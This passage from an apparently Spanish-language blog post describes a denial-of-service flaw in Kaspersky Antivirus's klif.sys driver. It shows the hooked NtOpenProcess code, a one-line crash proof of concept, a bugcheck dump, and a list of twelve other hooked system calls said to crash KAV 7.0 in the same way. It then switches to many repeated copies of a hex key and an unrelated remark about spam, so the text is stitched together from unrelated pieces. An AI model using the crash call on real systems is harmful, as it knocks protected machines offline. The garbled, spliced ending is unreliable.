IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
__try
{

if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED;

else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
ObjectAttributes, ClientId);
__except (EXCEPTION_EXECUTE_HANDLER)
{
... stuff here ...
}
}

El gran problema aquí es ClientId->UniqueProcess, ya que ClientId es un PUNTERO a una estructura. El hecho de accesar a una región invalida de memoria produce inmediatamente un PAGE_FAULT_IN_NONPAGED_AREA.


el exploit original fue creado por Ms-Rem y luce así


NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);

Comopodras observar los desarrolladores de KAV han usado un bloque try/except, y parece ser que no saben usar otro tipo de funciones manejadoras de erores.

Esperemos que los desarrolladores de Kaspersky Antivirus descubran el fabuloso programa llamado NtCall y corrigan su bug.


*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 1

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from f941b39a to f941840c

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4


STACK_COMMAND: kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

SYMBOL_STACK_INDEX: 0

FOLLOWUP_NAME: MachineOwner

IMAGE_NAME: klif.sys

SYMBOL_NAME: klif+1940c

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner

Algunos descubrimientos hechos por UG North muestran que hay otras funciones que tambien estan intervenidas por klif.sis las cuales pueden ser explotadas con ataques similares.

Lista de entradas en la SSDT explotables (Windows XP / KAV 7.0.0.55)

==================================
|[Idx] [nombre de la función] |
==================================
|[41 ] NtCreateKey
|[47 ] NtCreateProcess
|[48 ] NtCreateProcessEx
|[50 ] NtCreateSection
|[52 ] NtCreateSymbolicLinkObject
|[53 ] NtCreateThread
|[65 ] NtDeleteValueKey
|[99 ] NtLoadKey2
|[119] NtOpenKey
|[122] NtOpenProcess
|[125] NtOpenSection
|[177] NtQueryValueKey
==================================
Cualquier llamada a esas funciones con parametros invalidos, llevara a un BSOD.

Este tipo de exploit fue descubierto por Ms-Rem en el 2005 y funciona para KAV 5.0

Como se mostro este exploit funciona para todas la versiones de Kaspersky Antivirus incluyendo la nueva versión 7.0.

¿Realmente aun crees quie estas portegido?

09-f9-11-02-9d-74-e3-5b-d8-41-56-c5-63-56-88-c0

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c0

09F911029D74E35BD84156C5635688C0

09f911029d74e35bd84156c5635688c0

09-f9-11-02-9d-74-e3-5b-d8-41-56-c5-63-56-88-c0

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c0

09F911029D74E35BD84156C5635688C0

09f911029d74e35bd84156c5635688c0

09-f9-11-02-9d-74-e3-5b-d8-41-56-c5-63-56-88-c0

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c0

09F911029D74E35BD84156C5635688C0

09f911029d74e35bd84156c5635688c0

09-f9-11-02-9d-74-e3-5b-d8-41-56-c5-63-56-88-c0

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c0

09F911029D74E35BD84156C5635688C0

09f911029d74e35bd84156c5635688c0




no cabe duda que la vida esta llena de contradicciones... hace unos cuantos dias acaban de apresar al spammer numero uno del mundo el sr soloway, peor ami me eta llegando más spam, porque no se pero parece que hotmail me esta fallando....